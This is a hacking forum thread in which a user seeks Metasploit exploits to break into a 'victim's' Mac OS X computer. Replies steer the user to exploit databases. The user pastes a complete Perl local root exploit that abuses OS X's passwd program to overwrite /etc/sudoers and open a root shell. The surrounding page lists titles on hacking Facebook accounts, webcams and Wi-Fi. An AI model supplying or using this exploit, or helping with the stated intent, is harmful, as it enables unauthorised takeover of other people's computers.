Well, I started to use metasploit and I tried to search some exploits for Mac OS X Yosemite, but there were nothing. Is the OS too safe to get hacked with metasploit or what's the problem? I really want to solve this problem, cause my victims Computer is running on OSX. Any Ideas?
Forum Thread:
MetaSploit Issues
20
Replies
Forum Thread:
How to Hack Wireless Password Through MAC Address and IP Address
15
Replies
Forum Thread:
Answer My Question Please!
10
Replies
Forum Thread:
Problem with Bruteforcing with Hydra
0
Replies
Forum Thread:
Problem with Bruteforce Using Hydra
20
Replies
Forum Thread:
How to Set Up MinGW on Kali Using Wine
8
Replies
Forum Thread:
I Am Being Hacked Like Mr. Robot.
14
Replies
Forum Thread:
How to Install Tor as a Root in Kali Linux
0
Replies
Backdoor, Listeners:
How to Know if Your Computer or Smartphones Have One?
26
Replies
Forum Thread:
How to Investigate a Hacker ? Kali Linux ?
5
Replies
Forum Thread:
How to Download Video from Instagram
2
Replies
Forum Thread:
I Am Working on Hacking Facebook Account. I Need Members to Guide It for Me.
4
Replies
Forum Thread:
Is There a Silent .Doc Exploit Builder??
5
Replies
Forum Thread:
I'm Not Able to Create a How-to Article
2
Replies
Forum Thread:
Somebody Help Me to Hack SKM World Online Game
2
Replies
Forum Thread:
Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom?
67
Replies
Forum Thread:
Problems with TL-WN722N V2 (Monitor Mode)
13
Replies
Forum Thread:
Hacking a Instagram Account
8
Replies
Forum Thread:
Needing Help Setting Up Wifi on Linux
10
Replies
Forum Thread:
TL WN722N Usb Not Detected in Kali Linux 2017.1
14
Replies
How To:
Exploit Routers on an Unrooted Android Phone
How To:
4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
How to Hack Wi-Fi:
Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher
How to Hack Wi-Fi:
Automating Wi-Fi Hacking with Besside-ng
How To:
Set Up a Headless Raspberry Pi Hacking Platform Running Kali Linux
Hack Like a Pro:
How to Secretly Hack Into, Switch On, & Watch Anyone's Webcam Remotely
How To:
Scrape Target Email Addresses with TheHarvester
How To:
Get Unlimited Free Trials Using a "Real" Fake Credit Card Number
How To:
Crack Any Master Combination Lock in 8 Tries or Less Using This Calculator
Recon:
How to Research a Person or Organization Using the Operative Framework
How To:
Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2017
How to Hack Wi-Fi:
Cracking WPA2-PSK Passwords Using Aircrack-Ng
How to Hack Wi-Fi:
Capturing WPA Passwords by Targeting Users with a Fluxion Attack
Hack Like a Pro:
How to Exploit and Gain Remote Access to PCs Running Windows XP
How To:
Hack Android Using Kali (Remotely)
How To:
Crack Wi-Fi Passwords with Your Android Phone and Get Free Internet!
How To:
Hack WPA WiFi Passwords by Cracking the WPS PIN
Hack Like a Pro:
How to Hack Facebook, Part 2 (Facebook Password Extractor)
Hack Like a Pro:
How to Crack Online Passwords with Tamper Data & THC Hydra
How To:
Hack Windows 7 (Become Admin)
4 Responses
There are numerous exploits for OS X in Metasploit. Look again. In addition, check exploitdb for exploits or securityfocus.com. There are numerous exploits for OS X. It is far from safe!
Yeah, thanks. But with which kind of program do I use script like this:
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/perl
#
# /usr/bin/passwdOSX: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)
use POSIX;
$fakepasswd="/tmp/xpasswd.$$";
$passwdpid=($$ + 1);
$passwdtempfile="/tmp/.pwtmp.$passwdpid";
$sudoers="/etc/sudoers";
sub pexit{print("! @.\n");exit(1);}
print("* /usr/bin/passwdOSX: local root exploit.\n");
print("* by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fakepasswd);
print("* making fake password file. ($fakepasswd)\n");
open(FP,">$fakepasswd")||pexit("couldn't open/write to $fakepasswd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("* sym-linking $sudoers -> $passwdtempfile.\n");
symlink($sudoers,$passwdtempfile)||pexit("couldn't link files.");
print("* running /usr/bin/passwd on $fakepasswd.\n");
print("* (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fakepasswd \"ALL ALL=(ALL) ALL #\"");
print("\n* running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
That is a Perl script.
Security Focus is what I use. Sometimes they have the exploits already there.
Share Your Thoughts